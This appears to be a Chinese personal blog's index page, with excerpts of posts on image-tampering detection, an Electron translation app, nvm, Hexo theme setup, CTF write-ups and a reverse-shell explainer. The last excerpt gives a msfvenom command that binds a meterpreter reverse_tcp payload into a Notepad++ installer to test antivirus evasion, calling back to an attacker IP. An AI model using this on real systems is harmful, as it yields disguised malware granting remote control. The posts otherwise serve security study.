3.9k4 分钟

作业 (o′┏▽┓`o) # 图像篡改的类型 实践中,图像篡改至少有以下几种类型: 图像内容的修改(Tampering),比如通过 PS 实现换脸或者修改合同文字。其中大部分都可以归类到截取、复制、删除。 能够间接表达第一类篡改嫌疑的操作(Manipulation)。比如为了遮掩第一类篡改痕迹而做的中值滤波、高斯模糊、高斯噪音以及再次保存图像而产生的二次 JPEG 压缩。 一般而言,图像篡改的最终目的是识别第一类篡改,但是难度很大,需要很深厚的司法、摄影和图像专业知识,比如在传统的图像篡改识别领域,需要使用噪声一致性、几何一致性、光照一致性等方式来进行判断。在实际操作时,需要遍
1k1 分钟

项目地址:Google-Translate-Desktop # 准备工作 # 选择环境 node v16.20.0 / electron v20.3.12 # 基本方案 利用 npm 插件: google-translate-api 该插件提供了一个 API 接口:translate (text, options),能实现谷歌翻译的基本功能 用 electron 搭建程序的主要页面,用该插件实现简单的翻译 # 具体功能 自动检测语言并能选择翻译的目标语言 详细释义? 划词翻译 替换、复制翻译结果 快捷键呼出 # 开发实现 # 搭建环境 1234567
8251 分钟

# node 版本控制 大部分时候,并不是版本越新越好,开发过程中经常会遇到某些好用的插件只支持较低版本的 Nodejs ,这时候就需要用到版本控制。 使用 nvm,可以轻松管理版本。实用命令如下: 123nvm install [版本号] [lts] # 安装特定版本的nodenvm use [版本号] # 切换特定版本的nodenvm list # 列出已安装的node版本,星号标注当前使用的版本 # 项目仓库 package.json 是非常重要的文件,其中记录了项目的配置信息。 最好加一个 .gitignore 文件,其中记录 git 上传时忽略更改的目录和文件,基本上需要
6.1k6 分钟

shokaX 主题基于 shoka 主题进行二次开发,据说是因为原主题停止更新... 因为各种原因吧,若按照 shokaX 作者写的文档更改配置的话,还需要一定程度上参考一下 shoka 主题的配置文档, 所以,我决定记录一下这次博客迁移中对 shokaX 主题进行的更改。 # 主题安装 shokaX 主题配置文档中,使用主题作者自己搭的工具 SXC 进行安装, 注意:因为自定义内容较多,所以选择从 github 安装。 1234# hexo initnpm install shokax-cli --location=global# cd your_blogSXC i
35k32 分钟

# web # 1.welcomeToCiscn http://192.168.166.147:58005/flag flag # 2.ezphp WEB 手用 QQ 就能做题,提交 flag 格式:flag {xxxx},该题环境的 ip 为:web - 模板机 get_ip 的 ip,端口为:58003 http://192.168.166.147:58003 打开题目就跳转到腾讯网页面,F12 流量监控也没找到题目正常的返回数据,就用了 Burp 代理 打开 Burp 看到流量发往了 www.qq.com, 手动修改了一下流量目的地址
30k27 分钟

本周三(2022/6/8)我们队伍(中国矿业大学 02 队)代表中国矿业大学参加了 2021一带一路暨金砖大赛之企业信息系统安全赛项 的决赛,也顺利地以 1700/2000 分拿到了 CTF 的第一名。 比赛中我们一同解出了 Crypto,Re,Pwn 方向的所有赛题,赛后认真对解题思路做了整理,对剩余未解出的少部分赛题也做了复现总结: # Web 感觉题目都是常见的简单知识点,没什么太难的地方,唯一的难点就是有点谜语人,一堆登录框,没任何提示,就是要一顿乱莽 # web1 http://101.133.134.12:8001/
8.6k8 分钟

# PWN # nc 这题就不说了吧,连上啥都有,我连要用到的命令解释都给了~ # ret2text 看一下保护: 主函数: 后门函数: 栈溢出就行,一张好图理解一下: 思路:用 ‘a' 覆盖 buf 一直到覆盖上 ebp,然后将 ret (返回地址) 的地方写入为后门函数的地址。 双击左侧栏的 backdoor 函数,右侧能找到函数地址如图: 直接照思路这么写,能打通本地,但是会打不通远程,因为栈帧没有平衡(hint),这时候中间插个 retn 的 gadget 就能解决。 随便找个 retn 的地址 这个就能用: 最后,脚本如下(环境没关,可以继续打远程): 123
8.3k8 分钟

# 什么是反弹 shell? 正向连接,就是攻击者用自己的攻击机连接到目标主机的某一端口,常见的有 web 服务、ssh、远程桌面等等。 在实际情况下,总会有很多时候,我们不能通过正向连接访问到目标主机,这个时候就可以利用反向连接来实现。 反向连接,通俗来说就是,攻击者监听某个攻击机的指定端口,目标主机主动发起请求到该端口,并将命令行的输入输出转到攻击机上显示。 # 适用情况 反弹 shell 适用于如下几种常见的情况: 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。 所以让目标机主动发送请求到攻击机指定端口来 getshell <br> 目标机端口被占用。 但
2.1k2 分钟

测试杀软:360 全家桶 # MSF msfconsole mp_npp:(2022/4/16) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.158.139 LPORT=4444 -x npp.8.1.4.Installer.exe -f exe > mp_npp.exe <br> 监听: use exploit/multi/handler set payload windows/meterpreter